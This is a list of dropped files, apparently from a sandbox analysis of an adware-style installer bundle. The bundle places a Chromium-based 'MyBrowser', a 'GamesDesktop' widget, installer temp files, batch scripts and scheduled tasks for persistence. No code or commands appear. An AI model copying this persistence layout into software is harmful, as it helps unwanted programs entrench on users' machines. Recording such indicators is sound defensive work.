%Documents and Settings%\%current user%\Local Settings\Temp\nsi3A.tmp (6012 bytes)
%Documents and Settings%\%current user%\Local Settings\Temp\nsn47.tmp (102710 bytes)
%Documents and Settings%\%current user%\Local Settings\Temp\nso46.tmp\md5dll.dll (6 bytes)
%Documents and Settings%\%current user%\Local Settings\Temp\nso46.tmp\xml.dll (2005 bytes)
%Documents and Settings%\%current user%\Local Settings\Temp\nso46.tmp\System.dll (11 bytes)
%Documents and Settings%\%current user%\Local Settings\Temp\nso46.tmp\Math.dll (2489 bytes)
%Documents and Settings%\%current user%\Local Settings\Temp\nso46.tmp\inetc.dll (20 bytes)
%Documents and Settings%\%current user%\Local Settings\Temp\nso46.tmp\modern-wizard.bmp (26 bytes)
%Documents and Settings%\%current user%\Local Settings\Temporary Internet Files\Content.IE5\4DQJW9YN\setup[2].exe (28320 bytes)
%Documents and Settings%\%current user%\Local Settings\Temp\binsis142.xml (6 bytes)
%Documents and Settings%\%current user%\Local Settings\Temp\nso46.tmp\Banner.dll (4 bytes)
%Documents and Settings%\%current user%\Local Settings\Temp\nso46.tmp\nsDialogs.dll (9 bytes)
%Documents and Settings%\%current user%\Local Settings\Temp\bitool.xxx (4152 bytes)
%Documents and Settings%\%current user%\Local Settings\Temp\binsischeck654.xml (3413 bytes)
%Documents and Settings%\%current user%\Local Settings\Temp\nsz48.tmp (28320 bytes)
%Documents and Settings%\%current user%\Local Settings\Temporary Internet Files\Content.IE5\OPQISTQM\BiTool[1].dll (4152 bytes)
%Documents and Settings%\%current user%\Local Settings\Temp\nsi32.tmp\md5dll.dll (6 bytes)
%Documents and Settings%\%current user%\Local Settings\Temp\nsi32.tmp\System.dll (11 bytes)
%Documents and Settings%\%current user%\Local Settings\Temp\nsi32.tmp\post_reply.htm (14 bytes)
%Documents and Settings%\%current user%\Local Settings\Temp\nsi32.tmp\amisid.exe (1856 bytes)
%Documents and Settings%\%current user%\Local Settings\Temp\nsi32.tmp\inetc.dll (784 bytes)
%Documents and Settings%\%current user%\Local Settings\Temp\nsi32.tmp\Registry.dll (784 bytes)
%Documents and Settings%\%current user%\Local Settings\Temp\nsi32.tmp\checks.txt (544 bytes)
%Documents and Settings%\%current user%\Local Settings\Temp\nsn31.tmp (6085 bytes)
%Documents and Settings%\%current user%\Local Settings\Temp\nsi32.tmp\nsisos.dll (5 bytes)
%Documents and Settings%\%current user%\Local Settings\Temporary Internet Files\Content.IE5\OPQNSD2J\thankyou[1].php (14 bytes)
%Documents and Settings%\%current user%\Local Settings\Temp\nsg2E.tmp\System.dll (11 bytes)
%Documents and Settings%\%current user%\Local Settings\Temp\nsg2E.tmp\Registry.dll (784 bytes)
%Documents and Settings%\%current user%\Local Settings\Temp\nsg2E.tmp\checks.txt (544 bytes)
%Documents and Settings%\%current user%\Local Settings\Temp\nsq2D.tmp (6085 bytes)
%Documents and Settings%\%current user%\Local Settings\Temp\nsg2E.tmp\amisid.exe (1856 bytes)
%Documents and Settings%\%current user%\Local Settings\Application Data\gmsd_re_005010082\gmsd_re_005010082\1.20\cnf.cyl (269 bytes)
%Documents and Settings%\All Users\Start Menu\Programs\MyBrowser\MyBrowser.lnk (1 bytes)
%Program Files%\MyBrowser\MyBrowser\Temp\source268_21217\Chrome-bin\39.5.2171.95\Locales\cs.pak (223 bytes)
%Program Files%\MyBrowser\MyBrowser\Temp\source268_21217\Chrome-bin\39.5.2171.95\Locales\hi.pak (1712 bytes)
%Program Files%\MyBrowser\MyBrowser\Temp\source268_21217\Chrome-bin\39.5.2171.95\Locales\es-419.pak (226 bytes)
%Program Files%\MyBrowser\MyBrowser\Temp\source268_21217\Chrome-bin\39.5.2171.95\chrome_elf.dll (125 bytes)
%Program Files%\MyBrowser\MyBrowser\Temp\source268_21217\Chrome-bin\39.5.2171.95\libegl.dll (204 bytes)
%Program Files%\MyBrowser\MyBrowser\Temp\source268_21217\Chrome-bin\39.5.2171.95\Locales\sl.pak (211 bytes)
%Program Files%\MyBrowser\MyBrowser\Temp\source268_21217\Chrome-bin\39.5.2171.95\VisualElements\splash-620x300.png (11 bytes)
%Program Files%\MyBrowser\MyBrowser\Temp\source268_21217\Chrome-bin\39.5.2171.95\resources.pak (121304 bytes)
%Program Files%\MyBrowser\MyBrowser\Temp\source268_21217\Chrome-bin\39.5.2171.95\Locales\da.pak (206 bytes)
%Program Files%\MyBrowser\MyBrowser\Temp\source268_21217\Chrome-bin\39.5.2171.95\Locales\lv.pak (225 bytes)
%Program Files%\MyBrowser\MyBrowser\Temp\source268_21217\Chrome-bin\39.5.2171.95\Locales\fa.pak (308 bytes)
%Program Files%\MyBrowser\MyBrowser\Temp\source268_21217\Chrome-bin\39.5.2171.95\Locales\sv.pak (207 bytes)
%Program Files%\MyBrowser\MyBrowser\Temp\source268_21217\Chrome-bin\39.5.2171.95\Locales\lt.pak (221 bytes)
%Program Files%\MyBrowser\MyBrowser\Temp\source268_21217\Chrome-bin\39.5.2171.95\Locales\fi.pak (213 bytes)
%Program Files%\MyBrowser\MyBrowser\Temp\source268_21217\Chrome-bin\39.5.2171.95\Locales\pl.pak (220 bytes)
%Program Files%\MyBrowser\MyBrowser\Temp\source268_21217\Chrome-bin\39.5.2171.95\Locales\el.pak (1667 bytes)
%Program Files%\MyBrowser\MyBrowser\Temp\source268_21217\Chrome-bin\39.5.2171.95\Locales\id.pak (202 bytes)
%Program Files%\MyBrowser\MyBrowser\Application\mybrowser.exe (5873 bytes)
%Program Files%\MyBrowser\MyBrowser\Temp\source268_21217\Chrome-bin\39.5.2171.95\Locales\bg.pak (1640 bytes)
%Program Files%\MyBrowser\MyBrowser\Temp\source268_21217\Chrome-bin\mybrowser.exe (3869 bytes)
%Program Files%\MyBrowser\MyBrowser\Temp\source268_21217\Chrome-bin\39.5.2171.95\delegate_execute.exe (12288 bytes)
%Program Files%\MyBrowser\MyBrowser\Temp\source268_21217\Chrome-bin\39.5.2171.95\chrome_100_percent.pak (7386 bytes)
%Program Files%\MyBrowser\MyBrowser\Temp\source268_21217\Chrome-bin\39.5.2171.95\Locales\te.pak (1761 bytes)
%Program Files%\MyBrowser\MyBrowser\Temp\source268_21217\Chrome-bin\39.5.2171.95\Locales\en-GB.pak (189 bytes)
%Program Files%\MyBrowser\MyBrowser\Temp\source268_21217\Chrome-bin\39.5.2171.95\Locales\sk.pak (229 bytes)
%Program Files%\MyBrowser\MyBrowser\Temp\source268_21217\Chrome-bin\39.5.2171.95\Locales\fil.pak (228 bytes)
%Program Files%\MyBrowser\MyBrowser\Temp\source268_21217\Chrome-bin\39.5.2171.95\PepperFlash\pepflashplayer.dll (122658 bytes)
%Program Files%\MyBrowser\MyBrowser\Temp\source268_21217\Chrome-bin\39.5.2171.95\Locales\pt-PT.pak (222 bytes)
%Program Files%\MyBrowser\MyBrowser\Temp\source268_21217\Chrome-bin\39.5.2171.95\Locales\sr.pak (1610 bytes)
%Program Files%\MyBrowser\MyBrowser\Temp\source268_21217\Chrome-bin\39.5.2171.95\Locales\mr.pak (1708 bytes)
%Program Files%\MyBrowser\MyBrowser\Temp\source268_21217\Chrome-bin\39.5.2171.95\Locales\it.pak (220 bytes)
%Program Files%\MyBrowser\MyBrowser\Temp\source268_21217\Chrome-bin\39.5.2171.95\Locales\ko.pak (228 bytes)
%Program Files%\MyBrowser\MyBrowser\Temp\source268_21217\Chrome-bin\39.5.2171.95\chrome_child.dll (261193 bytes)
%Program Files%\MyBrowser\MyBrowser\Temp\source268_21217\Chrome-bin\39.5.2171.95\Extensions\external_extensions.json (103 bytes)
%Program Files%\MyBrowser\MyBrowser\Temp\source268_21217\Chrome-bin\39.5.2171.95\Locales\zh-TW.pak (190 bytes)
%Program Files%\MyBrowser\MyBrowser\Temp\source268_21217\Chrome-bin\39.5.2171.95\Locales\zh-CN.pak (187 bytes)
%Program Files%\MyBrowser\MyBrowser\Temp\source268_21217\Chrome-bin\39.5.2171.95\libglesv2.dll (5442 bytes)
%Program Files%\MyBrowser\MyBrowser\Application\master_preferences (814 bytes)
%Program Files%\MyBrowser\MyBrowser\Temp\source268_21217\Chrome-bin\39.5.2171.95\Locales\uk.pak (1621 bytes)
%Program Files%\MyBrowser\MyBrowser\Temp\source268_21217\Chrome-bin\39.5.2171.95\chrome.dll (237340 bytes)
%Program Files%\MyBrowser\MyBrowser\Temp\source268_21217\Chrome-bin\39.5.2171.95\nacl_irt_x86_32.nexe (15801 bytes)
%Program Files%\MyBrowser\MyBrowser\Temp\source268_21217\Chrome-bin\39.5.2171.95\Locales\et.pak (201 bytes)
%Program Files%\MyBrowser\MyBrowser\Temp\source268_21217\Chrome-bin\39.5.2171.95\Locales\he.pak (253 bytes)
%Program Files%\MyBrowser\MyBrowser\Temp\source268_21217\Chrome-bin\39.5.2171.95\icudtl.dat (76792 bytes)
%Program Files%\MyBrowser\MyBrowser\Temp\source268_21217\Chrome-bin\39.5.2171.95\Locales\nl.pak (216 bytes)
%Program Files%\MyBrowser\MyBrowser\Temp\source268_21217\Chrome-bin\wow_helper.exe (67 bytes)
%Program Files%\MyBrowser\MyBrowser\Temp\source268_21217\Chrome-bin\39.5.2171.95\Locales\th.pak (1702 bytes)
%Program Files%\MyBrowser\MyBrowser\Temp\source268_21217\Chrome-bin\39.5.2171.95\Locales\pt-BR.pak (217 bytes)
%Program Files%\MyBrowser\MyBrowser\Temp\source268_21217\Chrome-bin\39.5.2171.95\Locales\en-US.pak (189 bytes)
%Documents and Settings%\%current user%\Application Data\Microsoft\Internet Explorer\Quick Launch\MyBrowser.lnk (1 bytes)
%Program Files%\MyBrowser\MyBrowser\Temp\source268_21217\Chrome-bin\39.5.2171.95\chrome_200_percent.pak (7972 bytes)
%Program Files%\MyBrowser\MyBrowser\Temp\source268_21217\Chrome-bin\39.5.2171.95\Locales\ja.pak (266 bytes)
%Program Files%\MyBrowser\MyBrowser\Temp\source268_21217\Chrome-bin\39.5.2171.95\Locales\ml.pak (1826 bytes)
%Program Files%\MyBrowser\MyBrowser\Temp\source268_21217\Chrome-bin\39.5.2171.95\Locales\bn.pak (1731 bytes)
%Program Files%\MyBrowser\MyBrowser\Temp\source268_21217\Chrome-bin\39.5.2171.95\Locales\tr.pak (220 bytes)
%Program Files%\MyBrowser\MyBrowser\Temp\source268_21217\Chrome-bin\39.5.2171.95\VisualElements\smalllogo.png (9 bytes)
%Program Files%\MyBrowser\MyBrowser\Temp\source268_21217\Chrome-bin\39.5.2171.95\Locales\gu.pak (1705 bytes)
%Program Files%\MyBrowser\MyBrowser\Temp\source268_21217\Chrome-bin\39.5.2171.95\Locales\hu.pak (235 bytes)
%Program Files%\MyBrowser\MyBrowser\Application\39.5.2171.95\Installer\chrmstp.exe (6841 bytes)
%Program Files%\MyBrowser\MyBrowser\Temp\source268_21217\Chrome-bin\39.5.2171.95\VisualElements\logo.png (5 bytes)
%Program Files%\MyBrowser\MyBrowser\Temp\source268_21217\Chrome-bin\39.5.2171.95\secondarytile.png (3 bytes)
%Program Files%\MyBrowser\MyBrowser\Temp\source268_21217\Chrome-bin\39.5.2171.95\Locales\de.pak (224 bytes)
%Program Files%\MyBrowser\MyBrowser\Temp\source268_21217\Chrome-bin\39.5.2171.95\Locales\sw.pak (208 bytes)
%Program Files%\MyBrowser\MyBrowser\Temp\source268_21217\Chrome-bin\39.5.2171.95\Locales\fr.pak (239 bytes)
%Program Files%\MyBrowser\MyBrowser\Temp\source268_21217\Chrome-bin\39.5.2171.95\metro_driver.dll (1765 bytes)
%Program Files%\MyBrowser\MyBrowser\Temp\source268_21217\Chrome-bin\39.5.2171.95\Locales\vi.pak (247 bytes)
%Program Files%\MyBrowser\MyBrowser\Application\39.5.2171.95\Installer\setup.exe (6841 bytes)
%Program Files%\MyBrowser\MyBrowser\Temp\source268_21217\Chrome-bin\39.5.2171.95\Locales\ta.pak (1784 bytes)
%Program Files%\MyBrowser\MyBrowser\Temp\source268_21217\Chrome-bin\39.5.2171.95\libexif.dll (303 bytes)
%Program Files%\MyBrowser\MyBrowser\Temp\source268_21217\Chrome-bin\39.5.2171.95\nacl_irt_x86_64.nexe (20507 bytes)
%Program Files%\MyBrowser\MyBrowser\Temp\source268_21217\Chrome-bin\39.5.2171.95\nacl64.exe (12288 bytes)
%Program Files%\MyBrowser\MyBrowser\Temp\source268_21217\Chrome-bin\39.5.2171.95\Locales\ru.pak (1612 bytes)
%Program Files%\MyBrowser\MyBrowser\Temp\source268_21217\Chrome-bin\VisualElementsManifest.xml (392 bytes)
%Program Files%\MyBrowser\MyBrowser\Temp\source268_21217\Chrome-bin\39.5.2171.95\Locales\nb.pak (206 bytes)
%Program Files%\MyBrowser\MyBrowser\Temp\source268_21217\Chrome-bin\39.5.2171.95\Locales\ms.pak (206 bytes)
%Program Files%\MyBrowser\MyBrowser\Temp\source268_21217\Chrome-bin\39.5.2171.95\Locales\am.pak (302 bytes)
%Program Files%\MyBrowser\MyBrowser\Temp\source268_21217\Chrome-bin\39.5.2171.95\Locales\ar.pak (293 bytes)
%Program Files%\MyBrowser\MyBrowser\Temp\source268_21217\Chrome-bin\39.5.2171.95\Locales\es.pak (230 bytes)
%Program Files%\MyBrowser\MyBrowser\Temp\source268_21217\chrome.7z (1161171 bytes)
%Program Files%\MyBrowser\MyBrowser\Temp\source268_21217\Chrome-bin\39.5.2171.95\d3dcompiler_46.dll (22433 bytes)
%Program Files%\MyBrowser\MyBrowser\Temp\source268_21217\Chrome-bin\39.5.2171.95\39.5.2171.95.manifest (222 bytes)
%Documents and Settings%\All Users\Desktop\MyBrowser.lnk (1 bytes)
%Program Files%\MyBrowser\MyBrowser\Temp\source268_21217\Chrome-bin\39.5.2171.95\ffmpegsumo.dll (6337 bytes)
%Program Files%\MyBrowser\MyBrowser\Temp\source268_21217\Chrome-bin\39.5.2171.95\Locales\ca.pak (227 bytes)
%Program Files%\MyBrowser\MyBrowser\Temp\source268_21217\Chrome-bin\39.5.2171.95\Locales\hr.pak (214 bytes)
%Program Files%\MyBrowser\MyBrowser\Temp\source268_21217\Chrome-bin\39.5.2171.95\Locales\ro.pak (228 bytes)
%Program Files%\MyBrowser\MyBrowser\Temp\source268_21217\Chrome-bin\39.5.2171.95\pdf.dll (67091 bytes)
%Program Files%\MyBrowser\MyBrowser\Temp\source268_21217\Chrome-bin\39.5.2171.95\PepperFlash\manifest.json (2 bytes)
%Program Files%\MyBrowser\MyBrowser\Temp\source268_21217\Chrome-bin\39.5.2171.95\Locales\kn.pak (1768 bytes)
%Documents and Settings%\%current user%\Local Settings\Temp\nsu1B.tmp (7695 bytes)
%Documents and Settings%\%current user%\Local Settings\Temp\nskB.tmp (15 bytes)
%Documents and Settings%\%current user%\Local Settings\Temporary Internet Files\Content.IE5\4DQJW9YN\ibf-cmi-1938953175.us-east-1.elb.amazonaws[1].htm (30 bytes)
%Documents and Settings%\%current user%\Local Settings\Temp\nsd9.tmp\inetc.dll (784 bytes)
%Documents and Settings%\%current user%\Local Settings\Temp\nsd8.tmp (15 bytes)
%Documents and Settings%\%current user%\Local Settings\Temp\nsj7.tmp (7384 bytes)
%Documents and Settings%\%current user%\Local Settings\Temp\nskA.tmp (8560 bytes)
%Documents and Settings%\%current user%\Local Settings\Temp\nskC.tmp (15 bytes)
%Documents and Settings%\%current user%\Local Settings\Temp\nsqD.tmp (15 bytes)
%Documents and Settings%\%current user%\Local Settings\Temporary Internet Files\Content.IE5\WLMVCPYN\ibf-cmi-1938953175.us-east-1.elb.amazonaws[1].htm (30 bytes)
%Documents and Settings%\%current user%\Local Settings\Temp\2835.exe (14988 bytes)
%Documents and Settings%\%current user%\Local Settings\Temporary Internet Files\Content.IE5\desktop.ini (67 bytes)
%Documents and Settings%\%current user%\Local Settings\Temp\nsb3.tmp\inetc.dll (20 bytes)
%Documents and Settings%\%current user%\Local Settings\Temp\nsb2.tmp (15 bytes)
%Documents and Settings%\%current user%\Local Settings\Temp\nsn4.tmp (9771 bytes)
%Documents and Settings%\%current user%\Local Settings\Temporary Internet Files\Content.IE5\4DQJW9YN\desktop.ini (67 bytes)
%Documents and Settings%\%current user%\Local Settings\Temporary Internet Files\Content.IE5\WLMVCPYN\desktop.ini (67 bytes)
%Documents and Settings%\%current user%\Local Settings\Temp\nsd5.tmp (15 bytes)
%Documents and Settings%\%current user%\Local Settings\Temp\is-H57RU.tmp\nsd3C.tmp (3779 bytes)
%Documents and Settings%\All Users\Start Menu\Programs\GAMESDESKTOP\GamesDesktop.lnk (812 bytes)
%Documents and Settings%\%current user%\Local Settings\Temp\is-4OD0U.tmp\is-73DD7.tmp (8657 bytes)
%Documents and Settings%\%current user%\Local Settings\Temp\is-4OD0U.tmp\is-QHO3I.tmp (4185 bytes)
%Documents and Settings%\%current user%\Local Settings\Temp\is-4OD0U.tmp\is-F8943.tmp (2105 bytes)
%Documents and Settings%\%current user%\Local Settings\Temp\is-4OD0U.tmp\encrypt.exe (4185 bytes)
%Documents and Settings%\%current user%\Local Settings\Temp\is-4OD0U.tmp\_isetup\_shfoldr.dll (23 bytes)
%Documents and Settings%\%current user%\Local Settings\Application Data\gmsd_re_005010082\upgmsd_re_005010082.exe (23062 bytes)
%Documents and Settings%\%current user%\Local Settings\Temp\is-4OD0U.tmp\is-FI91J.tmp (15278 bytes)
%Program Files%\gmsd_re_005010082\unins000.msg (375 bytes)
%Documents and Settings%\%current user%\Local Settings\Temp\is-4OD0U.tmp\itdownload.dll (1281 bytes)
%Documents and Settings%\%current user%\Local Settings\Temp\is-4OD0U.tmp\upgmsd_re_005010082.7z (7433 bytes)
%Documents and Settings%\%current user%\Local Settings\Temp\is-4OD0U.tmp\CheckProc.cmd (288 bytes)
%Documents and Settings%\%current user%\Local Settings\Temp\is-4OD0U.tmp\predm.7z (2105 bytes)
%Documents and Settings%\%current user%\Local Settings\Temp\is-4OD0U.tmp\gmsd_re_005010082.7z (8657 bytes)
%Documents and Settings%\%current user%\Local Settings\Temp\is-4OD0U.tmp\ex.bat (1564 bytes)
%Documents and Settings%\%current user%\Local Settings\Temp\is-4OD0U.tmp\is-OHVJR.tmp (7433 bytes)
%Program Files%\gmsd_re_005010082\unins000.dat (29081 bytes)
%Program Files%\gmsd_re_005010082\gmsd_re_005010082.exe (29430 bytes)
%Documents and Settings%\%current user%\Local Settings\Temp\is-4OD0U.tmp\gamesdesktop_widget.7z (15278 bytes)
%Program Files%\gmsd_re_005010082\is-SLOUM.tmp (22284 bytes)
%Program Files%\gmsd_re_005010082\predm.exe (2321 bytes)
%Program Files%\gmsd_re_005010082\gamesdesktop_widget.exe (77294 bytes)
%Program Files%\MyBrowser\MyBrowser\Application\Icons\ebay.ico (55 bytes)
%Documents and Settings%\%current user%\Local Settings\Temp\3290\Icons\ted.ico (1913 bytes)
%Program Files%\MyBrowser\MyBrowser\Application\Icons\msn.ico (36 bytes)
%Program Files%\MyBrowser\MyBrowser\Application\Icons\espn.ico (36 bytes)
%Program Files%\MyBrowser\MyBrowser\Application\Icons\pinterest.ico (39 bytes)
%Program Files%\MyBrowser\MyBrowser\Application\Icons\tumblr.ico (40 bytes)
%Program Files%\MyBrowser\MyBrowser\Application\utility.exe (14988 bytes)
%Program Files%\MyBrowser\MyBrowser\Application\Icons\linkedin.ico (37 bytes)
%Program Files%\MyBrowser\MyBrowser\Application\Icons\groupom.ico (601 bytes)
%Documents and Settings%\%current user%\Local Settings\Temp\3290\Icons\yahoo_mail.ico (1913 bytes)
%Documents and Settings%\%current user%\Local Settings\Temp\3290\Icons\amazon.ico (2993 bytes)
%Documents and Settings%\%current user%\Local Settings\Temp\3290\Icons\kayak.com.ico (1601 bytes)
%Documents and Settings%\%current user%\Local Settings\Temp\3290\chrome.packed.7z (1424068 bytes)
%Documents and Settings%\%current user%\Local Settings\Temp\3290\Icons\ebay.ico (1913 bytes)
%Documents and Settings%\%current user%\Local Settings\Temp\3290\Icons\huffingtonpost.ico (1909 bytes)
%Program Files%\MyBrowser\MyBrowser\Application\Icons\gizmodo.ico (601 bytes)
%Program Files%\MyBrowser\MyBrowser\Application\Icons\cnn.ico (45 bytes)
%Program Files%\MyBrowser\MyBrowser\Application\Icons\gmail.ico (47 bytes)
%Program Files%\MyBrowser\MyBrowser\Application\Icons\bing.ico (42 bytes)
%Documents and Settings%\%current user%\Local Settings\Temp\3290\Icons\yahoo_finance.ico (2993 bytes)
%Documents and Settings%\%current user%\Local Settings\Temp\3290\Icons\tripadvisor.ico (1917 bytes)
%Documents and Settings%\%current user%\Local Settings\Temp\3290\Icons\facebook.ico (3913 bytes)
%Program Files%\MyBrowser\MyBrowser\Application\Icons\bbc.ico (35 bytes)
%Documents and Settings%\%current user%\Local Settings\Temp\3290\Icons\hotels.com.ico (1601 bytes)
%Program Files%\MyBrowser\MyBrowser\Application\Icons\etsy.ico (601 bytes)
%Documents and Settings%\%current user%\Local Settings\Temp\3290\Icons\mail_live_msn.ico (1592 bytes)
%Program Files%\MyBrowser\MyBrowser\Application\Icons\huffingtonpost.ico (49 bytes)
%Program Files%\MyBrowser\MyBrowser\Application\Icons\ted.ico (57 bytes)
%Program Files%\MyBrowser\MyBrowser\Application\Icons\weather_channel.ico (601 bytes)
%Documents and Settings%\%current user%\Local Settings\Temp\3290\Icons\agoda.ico (1921 bytes)
%Program Files%\MyBrowser\MyBrowser\Application\Icons\forbes.ico (40 bytes)
%Program Files%\MyBrowser\MyBrowser\Application\Icons\google_plus.ico (64 bytes)
%Program Files%\MyBrowser\MyBrowser\Application\Icons\search.ico (57 bytes)
%Program Files%\MyBrowser\MyBrowser\Application\Icons\netflix.ico (51 bytes)
%Program Files%\MyBrowser\MyBrowser\Application\Icons\priceline.ico (53 bytes)
%Program Files%\MyBrowser\MyBrowser\Application\Icons\bestbuy.ico (601 bytes)
%Documents and Settings%\%current user%\Local Settings\Temp\3290\Icons\google_news.ico (2993 bytes)
%Documents and Settings%\%current user%\Local Settings\Application Data\DD109E04-9249-4175-ABE-CCF37DDE4282\DD109E04-9249-4175-ABE-CCF37DDE4282.exe (14988 bytes)
%Documents and Settings%\%current user%\Local Settings\Temp\3290\Icons\wikipedia.ico (1913 bytes)
%Documents and Settings%\%current user%\Local Settings\Temp\3290\Icons\msn.ico (1588 bytes)
%Documents and Settings%\%current user%\Local Settings\Temp\3290\Icons\yelp.ico (1597 bytes)
%Documents and Settings%\%current user%\Local Settings\Temp\3290\Icons\yandex.ico (1588 bytes)
%Program Files%\MyBrowser\MyBrowser\Application\Icons\walmart.ico (48 bytes)
%Program Files%\MyBrowser\MyBrowser\Application\Icons\amazon.ico (601 bytes)
%Program Files%\MyBrowser\MyBrowser\Application\Icons\google_news.ico (601 bytes)
%Program Files%\MyBrowser\MyBrowser\Application\Icons\agoda.ico (61 bytes)
%Program Files%\MyBrowser\MyBrowser\Application\Icons\target.ico (50 bytes)
%WinDir%\Tasks\MyBrowser.job (1966 bytes)
%Documents and Settings%\%current user%\Local Settings\Temp\3290\Icons\linkedin.ico (1592 bytes)
%Program Files%\MyBrowser\MyBrowser\Application\Icons\9gag.ico (56 bytes)
%Documents and Settings%\%current user%\Local Settings\Temp\3290\Icons\twitter.ico (1588 bytes)
%Program Files%\MyBrowser\MyBrowser\Application\Icons\yahoo_finance.ico (601 bytes)
%Documents and Settings%\%current user%\Local Settings\Temp\3290\Icons\youtube.ico (3913 bytes)
%Documents and Settings%\%current user%\Local Settings\Temp\3290\Icons\mail.ru.ico (1909 bytes)
%Documents and Settings%\%current user%\Local Settings\Temporary Internet Files\Content.IE5\WLMVCPYN\ie.zip[1].004 (3985887 bytes)
%Documents and Settings%\%current user%\Local Settings\Temporary Internet Files\Content.IE5\WLMVCPYN\ie.zip[1].005 (3985887 bytes)
%Documents and Settings%\%current user%\Local Settings\Temporary Internet Files\Content.IE5\WLMVCPYN\ie.zip[1].002 (3985887 bytes)
%Documents and Settings%\%current user%\Local Settings\Temporary Internet Files\Content.IE5\WLMVCPYN\ie.zip[1].003 (3985887 bytes)
%Documents and Settings%\%current user%\Local Settings\Temporary Internet Files\Content.IE5\WLMVCPYN\ie.zip[1].001 (3985887 bytes)
%Documents and Settings%\%current user%\Local Settings\Temp\3290\Icons\gizmodo.ico (2993 bytes)
%Documents and Settings%\%current user%\Local Settings\Temp\3290\Icons\weather_channel.ico (5593 bytes)
%Documents and Settings%\%current user%\Local Settings\Temp\3290\Icons\tumblr.ico (1592 bytes)
%Documents and Settings%\%current user%\Local Settings\Temp\3290\Icons\skype.ico (1597 bytes)
%Documents and Settings%\%current user%\Local Settings\Temp\3290\Icons\yahoo.ico (1592 bytes)
%Documents and Settings%\%current user%\Local Settings\Temp\3290\Icons\groupom.ico (2993 bytes)
%Documents and Settings%\%current user%\Local Settings\Temp\3290\Icons\theguardian.ico (1597 bytes)
%Program Files%\MyBrowser\MyBrowser\Application\Icons\yahoo_search.ico (601 bytes)
%Documents and Settings%\%current user%\Local Settings\Temp\3290\Icons\bbc.ico (1588 bytes)
%Documents and Settings%\%current user%\Local Settings\Temp\3290\Icons\espn.ico (1588 bytes)
%Program Files%\MyBrowser\MyBrowser\Application\Icons\google_translate.ico (38 bytes)
%Documents and Settings%\%current user%\Local Settings\Temp\3290\Icons\icon.json (21 bytes)
%Program Files%\MyBrowser\MyBrowser\Application\Icons\reddit.ico (60 bytes)
%Program Files%\MyBrowser\MyBrowser\Application\Icons\mail.ru.ico (49 bytes)
%Documents and Settings%\%current user%\Local Settings\Temp\3290\Icons\priceline.ico (1913 bytes)
%Documents and Settings%\%current user%\Local Settings\Temp\3290\Icons\9gag.ico (1913 bytes)
%Documents and Settings%\%current user%\Local Settings\Temp\3290\Icons\reddit.ico (1917 bytes)
%Program Files%\MyBrowser\MyBrowser\Application\Icons\imdb.ico (601 bytes)
%Documents and Settings%\%current user%\Local Settings\Temporary Internet Files\Content.IE5\OPQNSD2J\ipgeoapi[1] (40 bytes)
%Documents and Settings%\%current user%\Local Settings\Temp\crbrw.zip (313192 bytes)
%Program Files%\MyBrowser\MyBrowser\Application\Icons\expedia.ico (61 bytes)
%Documents and Settings%\%current user%\Local Settings\Temp\3290\Icons\gmail.ico (1601 bytes)
%Documents and Settings%\%current user%\Local Settings\Temp\3290\Icons\pinterest.ico (1592 bytes)
%Documents and Settings%\%current user%\Local Settings\Temp\3290\setup.exe (37305 bytes)
%Program Files%\MyBrowser\MyBrowser\Application\Icons\hotels.com.ico (47 bytes)
%Documents and Settings%\%current user%\Local Settings\Temp\3290\Icons\nfl.ico (1913 bytes)
%Program Files%\MyBrowser\MyBrowser\Application\Icons\icon.json (9 bytes)
%Program Files%\MyBrowser\MyBrowser\Application\Icons\nba.ico (48 bytes)
%Documents and Settings%\%current user%\Local Settings\Temp\3290\Icons\bing.ico (1597 bytes)
%Program Files%\MyBrowser\MyBrowser\Application\Icons\booking.com.ico (45 bytes)
%Program Files%\MyBrowser\MyBrowser\Application\Icons\theguardian.ico (42 bytes)
%Program Files%\MyBrowser\MyBrowser\Application\Icons\mail_live_msn.ico (38 bytes)
%Documents and Settings%\%current user%\Local Settings\Temp\3290\prefs (823 bytes)
%Program Files%\MyBrowser\MyBrowser\Application\Icons\skype.ico (44 bytes)
%Program Files%\MyBrowser\MyBrowser\Application\Icons\kayak.com.ico (47 bytes)
%Program Files%\MyBrowser\MyBrowser\Application\Icons\yahoo_mail.ico (56 bytes)
%Documents and Settings%\%current user%\Local Settings\Temp\3290\Icons\netflix.ico (1909 bytes)
%Documents and Settings%\%current user%\Local Settings\Temp\3290\Icons\expedia.ico (1921 bytes)
%Documents and Settings%\%current user%\Local Settings\Temp\3290\Icons\search.ico (1917 bytes)
%Documents and Settings%\%current user%\Local Settings\Temp\3290\Icons\target.ico (1909 bytes)
%Documents and Settings%\%current user%\Local Settings\Temp\3290\Icons\cnn.ico (1601 bytes)
%Program Files%\MyBrowser\MyBrowser\Application\Icons\yelp.ico (42 bytes)
%Documents and Settings%\%current user%\Local Settings\Temp\3290\Icons\walmart.ico (1601 bytes)
%Program Files%\MyBrowser\MyBrowser\Application\Icons\yahoo.ico (39 bytes)
%Documents and Settings%\%current user%\Local Settings\Temp\3290\Icons\imdb.ico (2993 bytes)
%Documents and Settings%\%current user%\Local Settings\Temp\3290\Icons\google_plus.ico (1921 bytes)
%Program Files%\MyBrowser\MyBrowser\Application\Icons\wikipedia.ico (55 bytes)
%WinDir%\Tasks\DD109E04-9249-4175-ABE-CCF37DDE4282.job (1656 bytes)
%Program Files%\MyBrowser\MyBrowser\Application\Icons\tripadvisor.ico (58 bytes)
%Documents and Settings%\%current user%\Local Settings\Temp\3290\Icons\nytimes.ico (1921 bytes)
%Program Files%\MyBrowser\MyBrowser\Application\Icons\ikea.ico (601 bytes)
%Program Files%\MyBrowser\MyBrowser\Application\Icons\nfl.ico (56 bytes)
%Documents and Settings%\%current user%\Local Settings\Temp\3290\Icons\bestbuy.ico (3913 bytes)
%Program Files%\MyBrowser\MyBrowser\Application\Icons\facebook.ico (601 bytes)
%Program Files%\MyBrowser\MyBrowser\Application\Icons\yandex.ico (35 bytes)
%Program Files%\MyBrowser\MyBrowser\Application\Icons\nytimes.ico (61 bytes)
%Documents and Settings%\%current user%\Local Settings\Temp\3290\Icons\nba.ico (1601 bytes)
%Documents and Settings%\%current user%\Local Settings\Temp\3290\Icons\google_translate.ico (1592 bytes)
%Documents and Settings%\%current user%\Local Settings\Temp\3290\Icons\etsy.ico (3913 bytes)
%Documents and Settings%\%current user%\Local Settings\Temp\3290\Icons\forbes.ico (1592 bytes)
%Program Files%\MyBrowser\MyBrowser\Application\Icons\twitter.ico (36 bytes)
%Documents and Settings%\%current user%\Local Settings\Temp\3290\Icons\yahoo_search.ico (5593 bytes)
%Program Files%\MyBrowser\MyBrowser\Application\Icons\youtube.ico (601 bytes)
